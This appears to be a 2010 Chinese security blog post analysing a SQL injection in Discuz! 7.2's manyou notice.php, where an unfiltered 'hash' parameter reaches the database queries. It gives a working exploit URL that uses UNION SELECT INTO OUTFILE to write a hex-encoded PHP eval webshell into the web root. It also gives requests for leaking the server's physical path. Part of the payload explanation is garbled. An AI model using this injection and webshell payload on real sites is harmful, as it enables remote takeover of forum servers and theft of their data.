Discuz! v7.2 注入漏洞分析与利用

2010, May 25, 3:08 PM. oday收藏
Submitted by admin

漏洞分析:
文件./manyou/sources/notice.php

相关代码:

if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {   
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php script=notice');
}
}




很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。

/userapp.php script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23%A1%B1

 

al($_POST['O']); >的十六进制表示。

但想

into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。

/manyou/admincp.php my_suffix=%0A%0DTOBY57

大小: 69.7 K
尺寸: 500 x 187
浏览: 79 次
点击打开新窗口浏览全图

manyou/userapp.php %0D%0A=TOBY57

大小: 68.95 K
尺寸: 500 x 187
浏览: 40 次
点击打开新窗口浏览全图

这样就事具备,只差outfile了

Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 21116, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22043, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16685, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14211, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 43252, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 49966, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23008, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15733, 评论: 0)
dz~~~~马后炮 (浏览: 10482, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11584, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):